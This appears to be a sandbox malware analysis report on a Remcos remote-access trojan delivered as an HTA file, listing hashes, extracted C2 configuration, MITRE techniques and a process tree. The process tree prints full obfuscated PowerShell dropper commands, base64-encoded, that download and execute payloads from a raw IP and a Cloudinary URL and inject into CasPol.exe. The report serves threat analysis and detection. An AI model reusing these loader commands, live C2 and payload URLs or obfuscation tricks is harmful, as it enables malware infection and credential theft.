remcos | af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80

Analysis

max time kernel
147s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16/12/2024, 06:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

clearentirethingwithbestnoticetheeverythinggooodfrome.hta
Size

144KB
MD5

5215d83b478d7a718062863c5efbbeeb
SHA1

9ac735295a8b3bc10740d50669f6fa5c81ae10ce
SHA256

af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80
SHA512

b1ea72019653fa7858aa1b6ad1fa3fcf6974ade703be0edd55f891030706fc675425e5f1372dc3a61671dff5e40e6baceba019af60711cd65a248f7cecbca915
SSDEEP

768:t1EZFxaTOum2oum2M5KUJDVUKhCbGVf/AMF9woN83WkkA7MhrkK0IHj66666666l:tg

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20

exe.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

kelexrmcadmnnccupdated.duckdns.org:14646

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-B3IX49
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 2 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4388-100-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/1468-101-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/1468-101-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
13	2212	powershell.exe
19	516	powershell.exe
28	516	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
3668	cmd.exe
2212	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
516	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 516 set thread context of 100	516	powershell.exe	104
PID 100 set thread context of 1468	100	CasPol.exe	106
PID 100 set thread context of 1888	100	CasPol.exe	107
PID 100 set thread context of 4388	100	CasPol.exe	108

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2212	powershell.exe
2212	powershell.exe
516	powershell.exe
516	powershell.exe
516	powershell.exe
516	powershell.exe
4388	CasPol.exe
4388	CasPol.exe
1468	CasPol.exe
1468	CasPol.exe
1468	CasPol.exe
1468	CasPol.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
100	CasPol.exe
100	CasPol.exe
100	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	516	powershell.exe
Token: SeDebugPrivilege	4388	CasPol.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 3456 wrote to memory of 3668	3456	mshta.exe	83
PID 3456 wrote to memory of 3668	3456	mshta.exe	83
PID 3456 wrote to memory of 3668	3456	mshta.exe	83
PID 3668 wrote to memory of 2212	3668	cmd.exe	85
PID 3668 wrote to memory of 2212	3668	cmd.exe	85
PID 3668 wrote to memory of 2212	3668	cmd.exe	85
PID 2212 wrote to memory of 2256	2212	powershell.exe	86
PID 2212 wrote to memory of 2256	2212	powershell.exe	86
PID 2212 wrote to memory of 2256	2212	powershell.exe	86
PID 2256 wrote to memory of 460	2256	csc.exe	87
PID 2256 wrote to memory of 460	2256	csc.exe	87
PID 2256 wrote to memory of 460	2256	csc.exe	87
PID 2212 wrote to memory of 3416	2212	powershell.exe	94
PID 2212 wrote to memory of 3416	2212	powershell.exe	94
PID 2212 wrote to memory of 3416	2212	powershell.exe	94
PID 3416 wrote to memory of 516	3416	WScript.exe	95
PID 3416 wrote to memory of 516	3416	WScript.exe	95
PID 3416 wrote to memory of 516	3416	WScript.exe	95
PID 516 wrote to memory of 1860	516	powershell.exe	103
PID 516 wrote to memory of 1860	516	powershell.exe	103
PID 516 wrote to memory of 1860	516	powershell.exe	103
PID 516 wrote to memory of 100	516	powershell.exe	104
PID 516 wrote to memory of 100	516	powershell.exe	104
PID 516 wrote to memory of 100	516	powershell.exe	104
PID 516 wrote to memory of 100	516	powershell.exe	104
PID 516 wrote to memory of 100	516	powershell.exe	104
PID 516 wrote to memory of 100	516	powershell.exe	104
PID 516 wrote to memory of 100	516	powershell.exe	104
PID 516 wrote to memory of 100	516	powershell.exe	104
PID 516 wrote to memory of 100	516	powershell.exe	104
PID 516 wrote to memory of 100	516	powershell.exe	104
PID 100 wrote to memory of 1468	100	CasPol.exe	106
PID 100 wrote to memory of 1468	100	CasPol.exe	106
PID 100 wrote to memory of 1468	100	CasPol.exe	106
PID 100 wrote to memory of 1468	100	CasPol.exe	106
PID 100 wrote to memory of 1888	100	CasPol.exe	107
PID 100 wrote to memory of 1888	100	CasPol.exe	107
PID 100 wrote to memory of 1888	100	CasPol.exe	107
PID 100 wrote to memory of 1888	100	CasPol.exe	107
PID 100 wrote to memory of 4388	100	CasPol.exe	108
PID 100 wrote to memory of 4388	100	CasPol.exe	108
PID 100 wrote to memory of 4388	100	CasPol.exe	108
PID 100 wrote to memory of 4388	100	CasPol.exe	108

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\clearentirethingwithbestnoticetheeverythinggooodfrome.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3456
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3668
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2212
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kkaveuq3\kkaveuq3.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2256
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB18D.tmp" "c:\Users\Admin\AppData\Local\Temp\kkaveuq3\CSC37B425BA3BE412D84F0FF6FAD129D.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:460
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3416
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:516
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:1860
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:100
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\poutjkmzsfufhshgdnkxf"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1468
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\aqzmkdxtgnmssyvkmywziifc"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:1888
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\kkfelvquuwexunrovijstvatpca"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4388

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
6c0c4121d0b8a69014368f0cb48b769d

SHA1
3a037e85ea9295e22a8d28d686c6dd247a6905a1

SHA256
764ec3c49083fafbde02da2e8b13cdf02fda8319e1a33662344b607c82aea726

SHA512
2b7b0558b80230ec3864ef0de1598fb1d6e140e51a9e889dcfad8f1126f95f1c87dfb152c2f177e2f606959eaa65bf5eed6e2db4cfdce199c2ae133d9b982665

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB18D.tmp

Filesize
1KB

MD5
7150b05de963e7973101652be719d6cc

SHA1
bb66f22d7f931fd33377f81003ba1c48ade75394

SHA256
8516e40cdb8cb2afa251669770a093ee6f50e4620e381f724247d175916138e7

SHA512
cb9db94d009b30f8b1e349ff033fbfe73f3c75b77b81527b3912c998f09b680fb8aed897aab24abb5014e088e843bf859ca942f02cdf94006d7e7414845bd848

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_51f2eaow.dch.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kkaveuq3\kkaveuq3.dll

Filesize
3KB

MD5
54ef4e1bf3bb31c87b179361c17e1189

SHA1
864170d0592a4439833307ad76b916b68c9c9e23

SHA256
f9309a0950adc1829061227f3dd9373e65f9795471b6ccd4f8193127770c6f5c

SHA512
7a425d50931609a3f5fc6f27fb239a0158cd9e0f334e28bb7a013fcd36a1770bd9b365999281cbc996f091d6bd8c2ab2ed5511f446099390f06c7fc19d0f0b29

Download Submit
C:\Users\Admin\AppData\Local\Temp\poutjkmzsfufhshgdnkxf

Filesize
4KB

MD5
17eece3240d08aa4811cf1007cfe2585

SHA1
6c10329f61455d1c96e041b6f89ee6260af3bd0f

SHA256
7cc0db44c7b23e4894fe11f0d8d84b2a82ad667eb1e3504192f3ba729f9a7903

SHA512
a7de8d6322410ec89f76c70a7159645e8913774f38b84aafeeeb9f90dc3b9aa74a0a280d0bb6674790c04a8ff2d059327f02ebfda6c4486778d53b7fc6da6370

Download Submit
C:\Users\Admin\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS

Filesize
150KB

MD5
2e124153be958647e84566b305ecf94e

SHA1
d7d06fe6314ee8e4c31a971872632477ede38248

SHA256
5b5835cebcc79ae42d3edc11ddca5e2f6c4bf333e78d1b2d0733a091a9fd887e

SHA512
9bb7f048cfa817e406d63affc034ea89f7beb6dd584521d5b1a531a032e22470bb9e9c8a12931b5838a77267acf5fe64e8e788caee49c014348b75925614e450

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kkaveuq3\CSC37B425BA3BE412D84F0FF6FAD129D.TMP

Filesize
652B

MD5
2cc0fbaa3751e5581fc5bbf7e1161f5b

SHA1
2f0de46c0604ea15b4e27d3e97776ad28aca6327

SHA256
87240859965508e56169eb3642601cf83f9641f46aa32a5a7837122acc145bdf

SHA512
177b99bc903761519ae4c6dfb43d241513552b08cfee89f6c9f0a9f75b10500545da3a77c1ac1ba696b0fbd1fa2013fd3e909b0943445b7828dd2f168b1368f0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kkaveuq3\kkaveuq3.0.cs

Filesize
475B

MD5
0c431e10cf228fe2c475697b04ff0ebb

SHA1
04439e5d97e5c2e03f57caf24564925b32d644cb

SHA256
f0514c83d3a0460e90e267fbb96546f4b5890906eb7ea94799c38ec743fb91ae

SHA512
954a57476daa5408f0ff679972741e63e8fe61ff20bdefc40b83ad6ff633b0a7d5d3ddce7cfaff0a5ff0bc2300704f6c5639adbf44f38a818d22644814e5efcb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kkaveuq3\kkaveuq3.cmdline

Filesize
369B

MD5
5b79cb1cb49d53dcf6c99c24340a489d

SHA1
088c8a480c400bb5bd8146bc11ff0e8b78be8d1c

SHA256
9685555e4f080b675dd44f7536389d74fed9a7399fb9b483e698f474321f4234

SHA512
db3868a41d41c69cb1e91346008e8af249f478cf74579a13c31e93bef40eb840d20f16c948a6dc99abbeb5f750f0d3c0a551fd81b3de6db4e3447418dba5f0cb

Download Submit
memory/100-84-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-115-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-111-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/100-107-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/100-112-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-120-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-119-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-118-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-117-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-94-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-92-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-91-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-90-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-89-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-88-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-86-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-85-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-114-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-113-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/100-110-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/100-116-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/516-83-0x00000000196F0000-0x000000001978C000-memory.dmp

Filesize
624KB

Download
memory/516-82-0x0000000007EA0000-0x0000000008024000-memory.dmp

Filesize
1.5MB

Download
memory/1468-95-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1468-98-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1468-101-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1888-96-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2212-64-0x00000000717E0000-0x0000000071F90000-memory.dmp

Filesize
7.7MB

Download
memory/2212-19-0x0000000006AD0000-0x0000000006B02000-memory.dmp

Filesize
200KB

Download
memory/2212-65-0x00000000717E0000-0x0000000071F90000-memory.dmp

Filesize
7.7MB

Download
memory/2212-0-0x00000000717EE000-0x00000000717EF000-memory.dmp

Filesize
4KB

Download
memory/2212-63-0x00000000717EE000-0x00000000717EF000-memory.dmp

Filesize
4KB

Download
memory/2212-57-0x0000000007140000-0x0000000007148000-memory.dmp

Filesize
32KB

Download
